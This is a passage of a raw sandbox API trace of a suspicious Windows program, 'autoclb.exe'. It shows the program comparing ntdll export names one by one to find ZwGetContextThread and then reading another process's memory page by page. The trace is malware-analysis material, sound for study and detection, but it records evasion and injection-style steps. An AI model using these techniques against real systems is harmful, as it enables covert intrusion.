(lpString1="CsrAllocateCaptureBuffer", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwGetContextThread") returned -1 [0076.641] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgPrint", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwGetContextThread") returned -1 [0076.642] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwGetContextThread") returned -1 [0076.643] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwGetContextThread") returned -1 [0076.644] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwGetContextThread") returned -1 [0076.645] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="MD4Final", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="MD4Init", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="MD4Update", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="MD5Final", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="MD5Init", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="MD5Update", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwGetContextThread") returned -1 [0076.646] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwGetContextThread") returned -1 [0076.647] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtClose", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwGetContextThread") returned -1 [0076.648] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwGetContextThread") returned -1 [0076.649] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.658] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.658] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.658] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.658] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0076.658] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.658] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.658] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.659] StrRChrA (lpStart="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0076.659] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0076.659] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0076.659] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0076.659] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0076.659] lstrcmpiA (lpString1="autoclb.exe", lpString2="NTDLL.DLL") returned -1 [0076.659] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0076.659] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0076.659] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0076.659] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.659] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0076.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee380000, Buffer=0x7ff8, BufferSize=0x2580000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee381000, Buffer=0x7ff8, BufferSize=0x2581000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee382000, Buffer=0x7ff8, BufferSize=0x2582000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee383000, Buffer=0x7ff8, BufferSize=0x2583000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee384000, Buffer=0x7ff8, BufferSize=0x2584000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee385000, Buffer=0x7ff8, BufferSize=0x2585000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee386000, Buffer=0x7ff8, BufferSize=0x2586000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee387000, Buffer=0x7ff8, BufferSize=0x2587000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee388000, Buffer=0x7ff8, BufferSize=0x2588000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee389000, Buffer=0x7ff8, BufferSize=0x2589000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38a000, Buffer=0x7ff8, BufferSize=0x258a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38b000, Buffer=0x7ff8, BufferSize=0x258b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38c000, Buffer=0x7ff8, 